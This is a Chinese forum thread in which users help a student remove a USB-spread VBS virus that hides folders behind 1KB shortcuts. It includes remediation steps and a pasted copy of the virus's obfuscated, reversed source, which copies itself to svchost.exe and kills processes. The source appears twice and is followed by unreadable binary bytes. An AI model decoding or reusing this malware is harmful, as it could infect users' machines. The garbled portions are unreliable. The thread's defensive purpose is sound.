9,506
社区成员
发帖
与我相关
我的任务
分享1KB文件夹快捷方式.vbs病毒!!!
今天在机房上机,U盘使用后感染了.VBS病毒,表现为在被感染的U盘文件夹上显示1Kb大小的“快捷方式”字样,使用自己NOD32 查杀后,该病毒名为734821704.vbs 病毒体被NOD32 隔离后,本以为就恢复了文件夹原本的面貌,但是显然想法太单纯了,因为双击被查杀后的文件夹后,提示“该快捷方式所指向的项目“734821704.vbs已经更改或移动,因此该快捷方式无法正常工作 是否删除该快捷方式?””我知道是该快捷方式覆盖掉了原本的文件夹,病毒隔离后才出现这个状况,千万不能按提示删除它,否则就是删除了自己宝贵的文件夹内容……
我在网上大概看了下该种类型的病毒,七七八八说了一堆,也较可信的下载了“1KB文件夹快捷方式病毒清除专用附件.rar(http://bbs.ikaka.com/attachment.aspx?attachmentid=564690)”和“vbs快捷方式专杀.rar”,但是迫于经验缘故,对于确实的查杀恢复效果,没有把握,所以想先来这儿问问兄弟们,不知道有些什么建议和经验。
我在网上大概看了下该种类型的病毒,七七八八说了一堆,也较可信的下载了“1KB文件夹快捷方式病毒清除专用附件.rar(http://bbs.ikaka.com/attachment.aspx?attachmentid=564690)”和“vbs快捷方式专杀.rar”,但是迫于经验缘故,对于确实的查杀恢复效果,没有把握,所以想先来这儿问问兄弟们,不知道有些什么建议和经验。
...全文
请发表友善的回复…
发表回复
Brainin 2010-06-19
- 打赏
- 举报
[Quote=引用 4 楼 ljc007 的回复:]
打开病毒的VBS文件,阅读它的源代码,自己写一个专杀。
[/Quote]
好、、顶、
打开病毒的VBS文件,阅读它的源代码,自己写一个专杀。
[/Quote]
好、、顶、
lilifeng868 2010-06-08
- 打赏
- 举报
你好,我们公司的所有电脑也都是这种病毒,所有的文件基本上都有快捷方式,连我的电脑都打不开了。![]()
lilifeng868 2010-06-08
- 打赏
- 举报
????????????????????/
ljc007 2010-01-03
- 打赏
- 举报
[Quote=引用 16 楼 vb2010 的回复:]
就是啊,这玩意是“暴风一号”
我也中过,只是他妈的被加密了,不能自己写清除工具
[/Quote]
VBS的解密只要掌握了相应的方法即可。
向BAT、VBS等这些脚本的加密,都是只能骗过初学者而已,只要拥有了一定的脚本功底,破解起来很容易。
就是啊,这玩意是“暴风一号”
我也中过,只是他妈的被加密了,不能自己写清除工具
[/Quote]
VBS的解密只要掌握了相应的方法即可。
向BAT、VBS等这些脚本的加密,都是只能骗过初学者而已,只要拥有了一定的脚本功底,破解起来很容易。
密斯刘 2010-01-03
- 打赏
- 举报
就是啊,这玩意是“暴风一号”
我也中过,只是他妈的被加密了,不能自己写清除工具
我也中过,只是他妈的被加密了,不能自己写清除工具
shufeng1911 2010-01-02
- 打赏
- 举报
自己打开移动盘时注意点,一般就不会出问题
T-Stack 2010-01-02
- 打赏
- 举报
[Quote=引用 12 楼 byzhaohuan 的回复:]
我们也在中过类似的病毒,直接从我们学校论坛里下载了一个软件,1kb快捷方式病毒专杀工具,只要执行程序后可以直接解决问题的,需要的话给你发邮件吧
[/Quote]
谢谢啊,那个工具我也有了。
我们也在中过类似的病毒,直接从我们学校论坛里下载了一个软件,1kb快捷方式病毒专杀工具,只要执行程序后可以直接解决问题的,需要的话给你发邮件吧
[/Quote]
谢谢啊,那个工具我也有了。
ljc007 2010-01-02
- 打赏
- 举报
[Quote=引用 10 楼 guyawansong 的回复:]
代码加密了?看起来好乱啊。。。
比如on error resume next在楼主发的帖上是'rorrE nO emuseR txe
[/Quote]
这是VBS加密的一种思路:把代码首字符全部写成注释符号,所有单词按照一定规则乱序。只留下一行正常代码,在这行代码里面做一个自解密函数。运行VBS的时候,自解密函数就把那些以注释符号开头的行解密出来并运行之。
8楼给出的代码应该是不完整的,最关键的那行自解密代码并未包含在内。
代码加密了?看起来好乱啊。。。
比如on error resume next在楼主发的帖上是'rorrE nO emuseR txe
[/Quote]
这是VBS加密的一种思路:把代码首字符全部写成注释符号,所有单词按照一定规则乱序。只留下一行正常代码,在这行代码里面做一个自解密函数。运行VBS的时候,自解密函数就把那些以注释符号开头的行解密出来并运行之。
8楼给出的代码应该是不完整的,最关键的那行自解密代码并未包含在内。
byzhaohuan 2010-01-02
- 打赏
- 举报
我们也在中过类似的病毒,直接从我们学校论坛里下载了一个软件,1kb快捷方式病毒专杀工具,只要执行程序后可以直接解决问题的,需要的话给你发邮件吧
T-Stack 2010-01-01
- 打赏
- 举报
[Quote=引用 10 楼 guyawansong 的回复:]
代码加密了?看起来好乱啊。。。
比如on error resume next在楼主发的帖上是'rorrE nO emuseR txe
[/Quote]
应该是加密了,加密方面没有怎么研究过,具体怎么实现的一下子不好讲
代码加密了?看起来好乱啊。。。
比如on error resume next在楼主发的帖上是'rorrE nO emuseR txe
[/Quote]
应该是加密了,加密方面没有怎么研究过,具体怎么实现的一下子不好讲
古井荡月 2010-01-01
- 打赏
- 举报
代码加密了?看起来好乱啊。。。
比如on error resume next在楼主发的帖上是'rorrE nO emuseR txe
比如on error resume next在楼主发的帖上是'rorrE nO emuseR txe
T-Stack 2009-12-31
- 打赏
- 举报
呵呵,想不到你真把这些代码贴上了啊,不知道这里的兄弟看的出什么名堂么……我那个1kb病毒的源码好像不是这样子的。不过还是就以这个为参考大家讨论研究吧
hostkey918 2009-12-31
- 打赏
- 举报
这就是他的源码。。。大家看看,,,我也中了它!
'偶给要不',号外起乱名文中的我,风暴叫字名文英的我yoB叫字.eniF-_- 5
'rorrE nO emuseR txeN8
'sF miDShsW,oS:llehosF tetaerC=cejbOeRcs"(tGniTPisELif.oMeTsy"TcEjB teS:)ehShsWerC=lljbOetaw"(tceTpiRcSLleHS.laC:)"niaM l)(6
'(niaM buS)9
'rorrE nO emuseR miD:txeNV ,sgrA daoLsuriAsuriV ,A teS:ssrcSW=sgrugrA.tpiiV:stnem=daoLsurVniaMteG:)1(surissAsuriVniaMteG=)0(suriV=muNgrA:ihW oD:0uNgrA elsgrA < mP:tnuoC.raP=maraA&" "&maNgrA(sgrNgrA:)muuNgrA=muoL:1 + mpo8
'raPbuSaCL=magiR(esraP(th)3 ,ma)6
'aC tceleSraPbuS esma9
'aCes" ur"n2
'htaPnuRW(tfeL=.tpircSFtpircSemaNlluaC:)2 ,(nuR llhtaPnuR llaC:)SedavnIV(metsyaoLsurisuriV,daC:)ssA(nuR lletsyS%"\%tooRm\metsystsohcvs&" exe.oLsuriV)da7
't" esaCl" ,"txni","goni", "i"f7
'aPnuR%"=htetsyStooRmsys\%23metETON\E.DAP&" EXmaraPllaC:(nuR aPnuRC:)htI llaedavnetsySriV(maoLsuriV,dssAsulaC:)nuR lyS%"(Rmets\%tooetsyscvs\m.tsoh" exeuriV&daoLs)5
'saC" etab ,"mc""d3
'=htaPnuR c/ DMC"!iH ohceereh m'I"esuap&!uR llaC:taPnuR(n llaC:)hySedavnIriV(metsV,daoLsu)ssAsuriuR llaC:tsyS%"(n\%tooRmes\metsyse.tsohcvriV&" ex)daoLsu8
'saC" eger"3
'aPnuRr"=htidegeexe.t""&" rT&""aP(mi&)mar:"""" llaCR(nuRtaPnuaC:)hnI llSedavmetsyuriV(daoLsuriV,)ssAsllaC:(nuR syS%"oRmets\%tometsyhcvs\e.tso&" exsuriV)daoL5
'c" esaC"mh7
'PnuR=hta.hh" exe""&"T&""(miraraP"&)m:"""llaCnuR nuR(htaPaC:)I lldavnsySe(meturiVaoLsiV,dAsur:)ssllaCnuR S%"(etsyooRms\%tetsyvs\msohcxe.t&" euriVaoLs)d4
'h" esaC"pl7
'aPnuRw"=htplhnixe.23"&" eT&"""P(mir)mara""""&llaC:(nuR aPnuRC:)htI llaedavnetsySriV(maoLsuriV,dssAsulaC:)nuR lyS%"(Rmets\%tooetsyscvs\m.tsoh" exeuriV&daoLs)5
' esaC"rid"5
'"=htaPnuR(tfeL&"""araP(mirTrT(neL,)m)maraP(mi""""&)3-)nuR llaC:)htaPnuR(vnI llaC:metsySedaaoLsuriV(sAsuriV,dR llaC:)stsyS%"(nus\%tooRmecvs\metsy exe.tsohoLsuriV&")da9
'io" esaC"e8
'htaPnuRrP%"""=iFmargonI\%sel tenreterolpxELPXEI\rEXE.EROlaC:"""R(nuR l)htaPnuI llaC:ySedavniV(metsdaoLsurAsuriV,laC:)ss"(nuR lmetsyS%s\%tooRs\metsy.tsohcvV&" exeaoLsuri)d7
'" esaC"cmo6
'"=htaPnuR.rerolpxe::,n/ exe0EF40D02{601-AEA3-80-8D2A-990303B200 llaC:"}DaPnuR(nuR llaC:)htsySedavnIsuriV(meturiV,daoLlaC:)ssAsS%"(nuR ltooRmetsy\metsys\%e.tsohcvsuriV&" ex)daoLs9
'cme" esaC"9
'PnuR=htapxe"erolxe.rn/ e,e/,2{::40D0-0EFAEA3601-2A-90-8D2008303B}D90aC:"R llR(nuaPnu:)htllaCvnI SedaetsyiV(mLsur,daouriVssAsaC:)R ll"(nusyS%Rmet%toosys\\methcvs.tso exeiV&"Lsur)dao4
'lE esaCes7
' fIerPlbDsnInat=ecurTT eneh3
'rcSW.tpitiuQ4
' dnEfI4
'oemiT = tudetaD"(ffi ,"wwnIteGetcefetaDdtaD , - )e215
'miT fI0>tuoeM dnA D(htno= )etaD(yaD T )etaneh6
'C uriV lla)(trelAs8
' aC llkaMoJe(eknICM(ttnoD(heta)))3
' dnEfI4
' llaCtinoMsySro)(met5
'leS dnEtce7
'uS dnEb6
'uS boMinotSrsyet(m)2
'rE nOR roremusetxeN miD:ecorPmaNssE ,seluFexemaNlorP:sNssec=semayarrAsar"("exe.63" ,yart0"exe.at" ,rgmks"exe.mc" ,exe.dc" ,"oc.dm" ,"mdegerxe.ti" ,"edegercs.tir","ridegefip.tr" ,"idegemoc.tm" ,"fnocsxe.giV:)"eluFSBemaNlrrA=seG(yaniaMtsuriV:))1(aC:oDiK llorPll(ssececorPmaNssC:)seI llaedavnetsySteG(mVniaM(surieG,)1niaMtsuriV:))0( llaCPpeeKsecorSBV(sNlluF)semarcSW:S.tpi peel:0003pooL5
'buS dnE8
'buSnI davySeetsV(murioLsPdahtaiV,surssAtaP)h3
L娯 {??穂's壼;頬?qE鍟姒凄R侷漉$
?卉?M聵M燮$=蘦璍?O它郞W${闀I
? 莻 囁鲷N?淿迄:顕H閖碗?#:硈?潐绑帝+;_穒ka蘏cR鳣?y9f
x+轝?碹慧3Z雹筦?
赮D夝閐4?懋|€??t谥琀`1╭??螬诱NOzl>蜊[c?#物z萘澻"瓱.锅迻0?R2?礡涱K井4 ?稉?h无??劈篞Z?広揍 y W攺各vRas對S'_?豉舒麑冊e4蒑-dClq眛[IA??CI
'偶给要不',号外起乱名文中的我,风暴叫字名文英的我yoB叫字.eniF-_- 5
'rorrE nO emuseR txeN8
'sF miDShsW,oS:llehosF tetaerC=cejbOeRcs"(tGniTPisELif.oMeTsy"TcEjB teS:)ehShsWerC=lljbOetaw"(tceTpiRcSLleHS.laC:)"niaM l)(6
'(niaM buS)9
'rorrE nO emuseR miD:txeNV ,sgrA daoLsuriAsuriV ,A teS:ssrcSW=sgrugrA.tpiiV:stnem=daoLsurVniaMteG:)1(surissAsuriVniaMteG=)0(suriV=muNgrA:ihW oD:0uNgrA elsgrA < mP:tnuoC.raP=maraA&" "&maNgrA(sgrNgrA:)muuNgrA=muoL:1 + mpo8
'raPbuSaCL=magiR(esraP(th)3 ,ma)6
'aC tceleSraPbuS esma9
'aCes" ur"n2
'htaPnuRW(tfeL=.tpircSFtpircSemaNlluaC:)2 ,(nuR llhtaPnuR llaC:)SedavnIV(metsyaoLsurisuriV,daC:)ssA(nuR lletsyS%"\%tooRm\metsystsohcvs&" exe.oLsuriV)da7
't" esaCl" ,"txni","goni", "i"f7
'aPnuR%"=htetsyStooRmsys\%23metETON\E.DAP&" EXmaraPllaC:(nuR aPnuRC:)htI llaedavnetsySriV(maoLsuriV,dssAsulaC:)nuR lyS%"(Rmets\%tooetsyscvs\m.tsoh" exeuriV&daoLs)5
'saC" etab ,"mc""d3
'=htaPnuR c/ DMC"!iH ohceereh m'I"esuap&!uR llaC:taPnuR(n llaC:)hySedavnIriV(metsV,daoLsu)ssAsuriuR llaC:tsyS%"(n\%tooRmes\metsyse.tsohcvriV&" ex)daoLsu8
'saC" eger"3
'aPnuRr"=htidegeexe.t""&" rT&""aP(mi&)mar:"""" llaCR(nuRtaPnuaC:)hnI llSedavmetsyuriV(daoLsuriV,)ssAsllaC:(nuR syS%"oRmets\%tometsyhcvs\e.tso&" exsuriV)daoL5
'c" esaC"mh7
'PnuR=hta.hh" exe""&"T&""(miraraP"&)m:"""llaCnuR nuR(htaPaC:)I lldavnsySe(meturiVaoLsiV,dAsur:)ssllaCnuR S%"(etsyooRms\%tetsyvs\msohcxe.t&" euriVaoLs)d4
'h" esaC"pl7
'aPnuRw"=htplhnixe.23"&" eT&"""P(mir)mara""""&llaC:(nuR aPnuRC:)htI llaedavnetsySriV(maoLsuriV,dssAsulaC:)nuR lyS%"(Rmets\%tooetsyscvs\m.tsoh" exeuriV&daoLs)5
' esaC"rid"5
'"=htaPnuR(tfeL&"""araP(mirTrT(neL,)m)maraP(mi""""&)3-)nuR llaC:)htaPnuR(vnI llaC:metsySedaaoLsuriV(sAsuriV,dR llaC:)stsyS%"(nus\%tooRmecvs\metsy exe.tsohoLsuriV&")da9
'io" esaC"e8
'htaPnuRrP%"""=iFmargonI\%sel tenreterolpxELPXEI\rEXE.EROlaC:"""R(nuR l)htaPnuI llaC:ySedavniV(metsdaoLsurAsuriV,laC:)ss"(nuR lmetsyS%s\%tooRs\metsy.tsohcvV&" exeaoLsuri)d7
'" esaC"cmo6
'"=htaPnuR.rerolpxe::,n/ exe0EF40D02{601-AEA3-80-8D2A-990303B200 llaC:"}DaPnuR(nuR llaC:)htsySedavnIsuriV(meturiV,daoLlaC:)ssAsS%"(nuR ltooRmetsy\metsys\%e.tsohcvsuriV&" ex)daoLs9
'cme" esaC"9
'PnuR=htapxe"erolxe.rn/ e,e/,2{::40D0-0EFAEA3601-2A-90-8D2008303B}D90aC:"R llR(nuaPnu:)htllaCvnI SedaetsyiV(mLsur,daouriVssAsaC:)R ll"(nusyS%Rmet%toosys\\methcvs.tso exeiV&"Lsur)dao4
'lE esaCes7
' fIerPlbDsnInat=ecurTT eneh3
'rcSW.tpitiuQ4
' dnEfI4
'oemiT = tudetaD"(ffi ,"wwnIteGetcefetaDdtaD , - )e215
'miT fI0>tuoeM dnA D(htno= )etaD(yaD T )etaneh6
'C uriV lla)(trelAs8
' aC llkaMoJe(eknICM(ttnoD(heta)))3
' dnEfI4
' llaCtinoMsySro)(met5
'leS dnEtce7
'uS dnEb6
'uS boMinotSrsyet(m)2
'rE nOR roremusetxeN miD:ecorPmaNssE ,seluFexemaNlorP:sNssec=semayarrAsar"("exe.63" ,yart0"exe.at" ,rgmks"exe.mc" ,exe.dc" ,"oc.dm" ,"mdegerxe.ti" ,"edegercs.tir","ridegefip.tr" ,"idegemoc.tm" ,"fnocsxe.giV:)"eluFSBemaNlrrA=seG(yaniaMtsuriV:))1(aC:oDiK llorPll(ssececorPmaNssC:)seI llaedavnetsySteG(mVniaM(surieG,)1niaMtsuriV:))0( llaCPpeeKsecorSBV(sNlluF)semarcSW:S.tpi peel:0003pooL5
'buS dnE8
'buSnI davySeetsV(murioLsPdahtaiV,surssAtaP)h3
L娯 {??穂's壼;頬?qE鍟姒凄R侷漉$
?卉?M聵M燮$=蘦璍?O它郞W${闀I
? 莻 囁鲷N?淿迄:顕H閖碗?#:硈?潐绑帝+;_穒ka蘏cR鳣?y9f
x+轝?碹慧3Z雹筦?
赮D夝閐4?懋|€??t谥琀`1╭??螬诱NOzl>蜊[c?#物z萘澻"瓱.锅迻0?R2?礡涱K井4 ?稉?h无??劈篞Z?広揍 y W攺各vRas對S'_?豉舒麑冊e4蒑-dClq眛[IA??CI
古井荡月 2009-12-31
- 打赏
- 举报
关闭NOD32的主动防御,进NOD32的隔离,把这个734821704.vbs文件回复,右击选择编辑,然后把内容发上来给大家伙看看吧。。
T-Stack 2009-12-26
- 打赏
- 举报
[Quote=引用 4 楼 ljc007 的回复:]
打开病毒的VBS文件,阅读它的源代码,自己写一个专杀。
[/Quote]
呵呵,小弟要有你这么强就好了。谢谢啊
打开病毒的VBS文件,阅读它的源代码,自己写一个专杀。
[/Quote]
呵呵,小弟要有你这么强就好了。谢谢啊
clevise 2009-12-26
- 打赏
- 举报
楼上正解~~~~
ljc007 2009-12-26
- 打赏
- 举报
打开病毒的VBS文件,阅读它的源代码,自己写一个专杀。
T-Stack 2009-12-25
- 打赏
- 举报
[Quote=引用 2 楼 happycell188 的回复:]
###################################################################################
###################################################################################
上面有一部分有点乱哈!整理如下:
从开始中打开“运行”,用 attrib f:\* -s -h /s /d (f:\*为路径,指的是f盘根目录下所有文件) 去除被添加上的系统、隐藏属性,然后将每个分区根目录下的文件“.vbs”和 “autorun.inf”删除!
###################################################################################
###################################################################################
[/Quote]
呵呵,我也喜欢手工查杀,但是为了省事,我刚才下载了金山U盘专杀工具!谢谢你啊,真的,我刚发帖不久,你就写了这么多内容!
###################################################################################
###################################################################################
上面有一部分有点乱哈!整理如下:
从开始中打开“运行”,用 attrib f:\* -s -h /s /d (f:\*为路径,指的是f盘根目录下所有文件) 去除被添加上的系统、隐藏属性,然后将每个分区根目录下的文件“.vbs”和 “autorun.inf”删除!
###################################################################################
###################################################################################
[/Quote]
呵呵,我也喜欢手工查杀,但是为了省事,我刚才下载了金山U盘专杀工具!谢谢你啊,真的,我刚发帖不久,你就写了这么多内容!
喜-喜 2009-12-25
- 打赏
- 举报
###################################################################################
###################################################################################
上面有一部分有点乱哈!整理如下:
从开始中打开“运行”,用 attrib f:\* -s -h /s /d (f:\*为路径,指的是f盘根目录下所有文件) 去除被添加上的系统、隐藏属性,然后将每个分区根目录下的文件“.vbs”和 “autorun.inf”删除!
###################################################################################
###################################################################################
###################################################################################
上面有一部分有点乱哈!整理如下:
从开始中打开“运行”,用 attrib f:\* -s -h /s /d (f:\*为路径,指的是f盘根目录下所有文件) 去除被添加上的系统、隐藏属性,然后将每个分区根目录下的文件“.vbs”和 “autorun.inf”删除!
###################################################################################
###################################################################################
喜-喜 2009-12-25
- 打赏
- 举报
###################################################################################
###################################################################################
呵呵,让我碰到你这个问题了!我也遇见过,但成功的清除了!下面是我总结的内容,看看吧,百分之百管用!
这种病毒,不窃取你的数据,就是很会搞破坏!电脑里无论哪个分区,其根目录下的文件夹均会受到它的破坏!破坏方式很简单:将每一个分区根目录下的每一个文件夹创建快捷方式,然后将源文件夹加上系统、隐藏属性!
这种病毒传播极为迅速,主要方式:移动设备传播。所到之处,存储设备根目录下文件夹无一幸免!
这种病毒,我已经接触到了好几次!最初是U盘受感染,拿到一个“装有杀毒软件”的计算机上手动处理后,“丢失的文件”被找回!但如果一台个人电脑上的文件受到感染,文件少的话还好说,文件多的话就麻烦了,不过怎么着,都能被解决的!由于病毒可以自我复制,每个分区根目录下均有副本,而且副本之间相互关联,删除一个后,会马上被恢复!实在令人厌烦....
电脑正常启动时无法进行删除,我们可以进入安全模式手动删除文件!进入安全模式后,打开我的电脑,选择“工具”菜单项,选择“文件夹选项”选项卡,在“查看”里,将“隐藏受保护的操作系统文件”前的对号去掉,选择“显示所有文件和文件夹”!然后回到电脑分根目录下,看到了吧,所有隐藏的文件都被显示了出来,删除所有快捷方式!从开始中打开“运行”,用
attrib f:\* -s -h /s /d(f:\*为路径,指的是f盘根目录下所有文件)去除被添加上的系统、隐藏属性,然后将每个分区根目录下的文件“.vbs”和
“autorun.inf”!然后重启计算机,看吧!问题解决了...
防范措施:U盘对病毒的传播要借助autorun.inf文件的帮助,病毒首先把自身复制到u盘,然后创建一个autorun.inf,在你双击u盘时,会根据autorun.inf中的设置去运行u盘中的病毒,我们只要可以阻止autorun.inf文件的创建,那么U盘上就算有病毒也只能躺着睡大觉了,大家可能也想到这个,但是不管给autorun.inf设置了什么属性,病毒都会更改它,我提到的方法就是,在根目录下,删除autorun.inf文件,然后,根目下建立一个文件夹,名字就叫autorun.inf,这样一来,因为在同一目录下,病毒就无能为力,创建不了autorun.inf文件了,以后会不会出新病毒,自动去删文件夹,然后再建立文件就不知道了,但至少现阶段,这种方法是非常有效的。但是,由于这个文件夹可以被改名,因此许多新的木马和病毒采用改名后再创建autorun.inf文件来达到感染U盘的目的。不过对于安全意识强的用户,用这种方法来判断自己的U盘是否遭到感染也未尝不可。
###################################################################################
###################################################################################
###################################################################################
呵呵,让我碰到你这个问题了!我也遇见过,但成功的清除了!下面是我总结的内容,看看吧,百分之百管用!
这种病毒,不窃取你的数据,就是很会搞破坏!电脑里无论哪个分区,其根目录下的文件夹均会受到它的破坏!破坏方式很简单:将每一个分区根目录下的每一个文件夹创建快捷方式,然后将源文件夹加上系统、隐藏属性!
这种病毒传播极为迅速,主要方式:移动设备传播。所到之处,存储设备根目录下文件夹无一幸免!
这种病毒,我已经接触到了好几次!最初是U盘受感染,拿到一个“装有杀毒软件”的计算机上手动处理后,“丢失的文件”被找回!但如果一台个人电脑上的文件受到感染,文件少的话还好说,文件多的话就麻烦了,不过怎么着,都能被解决的!由于病毒可以自我复制,每个分区根目录下均有副本,而且副本之间相互关联,删除一个后,会马上被恢复!实在令人厌烦....
电脑正常启动时无法进行删除,我们可以进入安全模式手动删除文件!进入安全模式后,打开我的电脑,选择“工具”菜单项,选择“文件夹选项”选项卡,在“查看”里,将“隐藏受保护的操作系统文件”前的对号去掉,选择“显示所有文件和文件夹”!然后回到电脑分根目录下,看到了吧,所有隐藏的文件都被显示了出来,删除所有快捷方式!从开始中打开“运行”,用
attrib f:\* -s -h /s /d(f:\*为路径,指的是f盘根目录下所有文件)去除被添加上的系统、隐藏属性,然后将每个分区根目录下的文件“.vbs”和
“autorun.inf”!然后重启计算机,看吧!问题解决了...
防范措施:U盘对病毒的传播要借助autorun.inf文件的帮助,病毒首先把自身复制到u盘,然后创建一个autorun.inf,在你双击u盘时,会根据autorun.inf中的设置去运行u盘中的病毒,我们只要可以阻止autorun.inf文件的创建,那么U盘上就算有病毒也只能躺着睡大觉了,大家可能也想到这个,但是不管给autorun.inf设置了什么属性,病毒都会更改它,我提到的方法就是,在根目录下,删除autorun.inf文件,然后,根目下建立一个文件夹,名字就叫autorun.inf,这样一来,因为在同一目录下,病毒就无能为力,创建不了autorun.inf文件了,以后会不会出新病毒,自动去删文件夹,然后再建立文件就不知道了,但至少现阶段,这种方法是非常有效的。但是,由于这个文件夹可以被改名,因此许多新的木马和病毒采用改名后再创建autorun.inf文件来达到感染U盘的目的。不过对于安全意识强的用户,用这种方法来判断自己的U盘是否遭到感染也未尝不可。
###################################################################################
###################################################################################
